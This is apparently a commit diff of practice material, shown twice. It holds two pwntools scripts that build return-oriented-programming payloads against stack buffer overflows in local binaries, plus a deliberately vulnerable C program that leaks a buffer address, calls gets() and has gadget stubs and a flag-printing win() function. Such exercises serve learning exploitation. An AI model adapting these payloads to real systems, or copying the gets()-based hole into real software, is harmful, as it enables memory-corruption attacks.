sharpicx · March 1, 2024 07:48
diff --git a/exp.py b/exp.py
 from pwn import *

 context(arch='amd64', os='linux', log_level='DEBUG')

 e = ELF('./pubg')
 p = e.process()

 offset = 96

 p.recvuntil(b"coordinate: ")
 leak = int(p.recvline(), 16)
 log.info(f"{hex(leak) = }")

 payload = b""
 payload += b"A" * offset
 payload += p64(leak - 0x0000000000401306)
 payload += p64(0x0000000000401250)
 payload += p64(0x0000000000401257)
 payload += p64(0x000000000040125a)
 payload += p64(0x0000000000401261)

 p.sendline(payload)
 p.interactive()
diff --git a/exploit.py b/exploit.py
 from pwn import *

 context(arch="amd64", os="linux", log_level="debug")
 e = ELF("./a.out")
 p = e.process()

 p.recvuntil(b"at: ")
 leak = int(p.recvline(), 16)
 log.info(f"{hex(leak) = }")
 base = leak - e.sym["vuln"]
 log.info(f"{hex(base) = }")
 e.address = base

 payload = b""
 payload += b"A" * 32
 payload += p64(e.sym["vuln"])
 payload += p64(0x00000000004011DA)
 payload += p64(0xDEADBEEF)
 payload += p64(0x00000000004011DC)
 payload += p64(0xDEADC0DE)
 payload += p64(0x0)
 payload += p64(0x00000000004011E5)
 payload += p64(0xCAFEBABE)
 payload += p64(0x00000000004011E2)
 payload += p64(0x8937191)
 payload += p64(0x0)
 payload += p64(0x00000000004011ED)

 p.sendline(payload)
 p.interactive()
diff --git a/test.c b/test.c
 #include <stdio.h>
 #include <stdlib.h>

 void vuln() {
  char buffer[20];

  printf("victim at: %p\n", buffer);

  gets(buffer);
 }

 int main() {
  vuln();

  return 0;
 }
 void a() {
  // Function prologue
  asm volatile("pushq %rbp\n"      // Push rbp onto the stack
               "movq %rsp, %rbp\n" // Move rsp into rbp
  );

  // Your assembly instructions go here
  asm volatile("popq %rdi\n" // Pop value into rdi
               "ret\n"       // Return
  );

  // Function epilogue
  asm volatile("popq %rsi\n" // Pop value into rsi
               "popq %r12\n" // Pop value into r12
               "ret\n"       // Return
  );

  // Additional instructions...
  asm volatile("popq %rcx\n" // Pop value into rcx
               "popq %r9\n"  // Pop value into r9
               "popq %rbp\n" // Pop value into rbp
               "ret\n"       // Return
  );

  asm volatile("popq %rdx\n" // Pop value into rdx
               "ret\n"       // Return
  );

  asm volatile("nop\n" // No operation
  );

  asm volatile("popq %rbp\n" // Pop value into rbp
               "ret\n"       // Return
  );
 }
 void win(int check, int check2, int check3, int check4) {
  if (check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xcafebabe &&
      check4 == 0x8937191) {
    FILE *file;
    char buffer[100]; // Buffer to store each line of the file

    // Open the file in read mode
    file = fopen("flag.txt", "r");
    if (file == NULL) {
      perror("Error opening file");
      return; // Corrected
    }

    // Read and print each line of the file
    while (fgets(buffer, sizeof(buffer), file) != NULL) {
      printf("%s", buffer);
    }

    // Close the file
    fclose(file);

    // No need to return 0; // Corrected
  } else {
    puts("Not nice!");
  }
 }
	from pwn import *

	context(arch='amd64', os='linux', log_level='DEBUG')

	e = ELF('./pubg')
	p = e.process()

	offset = 96

	p.recvuntil(b"coordinate: ")
	leak = int(p.recvline(), 16)
	log.info(f"{hex(leak) = }")

	payload = b""
	payload += b"A" * offset
	payload += p64(leak - 0x0000000000401306)
	payload += p64(0x0000000000401250)
	payload += p64(0x0000000000401257)
	payload += p64(0x000000000040125a)
	payload += p64(0x0000000000401261)

	p.sendline(payload)
	p.interactive()
	from pwn import *

	context(arch="amd64", os="linux", log_level="debug")
	e = ELF("./a.out")
	p = e.process()

	p.recvuntil(b"at: ")
	leak = int(p.recvline(), 16)
	log.info(f"{hex(leak) = }")
	base = leak - e.sym["vuln"]
	log.info(f"{hex(base) = }")
	e.address = base

	payload = b""
	payload += b"A" * 32
	payload += p64(e.sym["vuln"])
	payload += p64(0x00000000004011DA)
	payload += p64(0xDEADBEEF)
	payload += p64(0x00000000004011DC)
	payload += p64(0xDEADC0DE)
	payload += p64(0x0)
	payload += p64(0x00000000004011E5)
	payload += p64(0xCAFEBABE)
	payload += p64(0x00000000004011E2)
	payload += p64(0x8937191)
	payload += p64(0x0)
	payload += p64(0x00000000004011ED)

	p.sendline(payload)
	p.interactive()
	#include <stdio.h>
	#include <stdlib.h>

	void vuln() {
	char buffer[20];

	printf("victim at: %p\n", buffer);

	gets(buffer);
	}

	int main() {
	vuln();

	return 0;
	}
	void a() {
	// Function prologue
	asm volatile("pushq %rbp\n" // Push rbp onto the stack
	"movq %rsp, %rbp\n" // Move rsp into rbp
	);

	// Your assembly instructions go here
	asm volatile("popq %rdi\n" // Pop value into rdi
	"ret\n" // Return
	);

	// Function epilogue
	asm volatile("popq %rsi\n" // Pop value into rsi
	"popq %r12\n" // Pop value into r12
	"ret\n" // Return
	);

	// Additional instructions...
	asm volatile("popq %rcx\n" // Pop value into rcx
	"popq %r9\n" // Pop value into r9
	"popq %rbp\n" // Pop value into rbp
	"ret\n" // Return
	);

	asm volatile("popq %rdx\n" // Pop value into rdx
	"ret\n" // Return
	);

	asm volatile("nop\n" // No operation
	);

	asm volatile("popq %rbp\n" // Pop value into rbp
	"ret\n" // Return
	);
	}
	void win(int check, int check2, int check3, int check4) {
	if (check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xcafebabe &&
	check4 == 0x8937191) {
	FILE *file;
	char buffer[100]; // Buffer to store each line of the file

	// Open the file in read mode
	file = fopen("flag.txt", "r");
	if (file == NULL) {
	perror("Error opening file");
	return; // Corrected
	}

	// Read and print each line of the file
	while (fgets(buffer, sizeof(buffer), file) != NULL) {
	printf("%s", buffer);
	}

	// Close the file
	fclose(file);

	// No need to return 0; // Corrected
	} else {
	puts("Not nice!");
	}
	}